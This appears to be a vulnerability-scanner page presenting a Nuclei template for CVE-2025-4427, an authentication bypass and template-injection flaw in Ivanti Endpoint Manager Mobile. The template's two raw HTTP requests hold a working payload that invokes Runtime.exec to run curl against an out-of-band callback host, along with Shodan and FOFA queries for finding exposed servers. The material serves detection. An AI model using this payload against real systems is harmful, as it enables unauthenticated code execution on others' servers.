Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution
CVE-2025-4427
Verified
Description
An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection.
Severity
Critical
CVSS Score
5.3
Exploit Probability
91%
Affected Product
endpoint_manager_mobile
Published Date
May 15, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
CVE-2025-4427.yaml
id: CVE-2025-4427
info:
name: Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection.
impact: |
Unauthenticated attackers can execute arbitrary code with elevated privileges through server-side template injection in bean validators, achieving complete system compromise.
remediation: |
Apply the security patches as described in the Ivanti security advisory for Endpoint Manager Mobile.
reference:
- https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-4427
cwe-id: CWE-288
epss-score: 0.9146
epss-percentile: 0.99646
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:"362091310"
fofa-query: icon_hash="362091310"
product: endpoint_manager_mobile
vendor: ivanti
tags: cve,cve2025,ivanti,epmm,rce,ssti,kev,vkev,vuln
http:
- raw:
- |
GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1
Host: {{Hostname}}
- |
GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "localizedMessage"
- type: regex
part: body
regex:
- "Format 'Process\\[pid="
- "Format 'java\\.lang\\.UNIXProcess@[0-9a-f]+'"
condition: or
- type: word
part: interactsh_protocol
words:
- dns
- type: status
status:
- 400
# digest: 4a0a004730450220600a4f8150f763cc387af5a727bfa22c24233f0727f16ae4040abb934ab0c109022100ddaca13ef8ef53a98f216b27b98ab78e0a2be52d4e920c1594f05d21af3931e2:922c64590222798bb761d5b6d8e729505.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-4427
CWE ID:
cwe-288
Remediation Steps
Apply the security patches as described in the Ivanti security advisory for Endpoint Manager Mobile.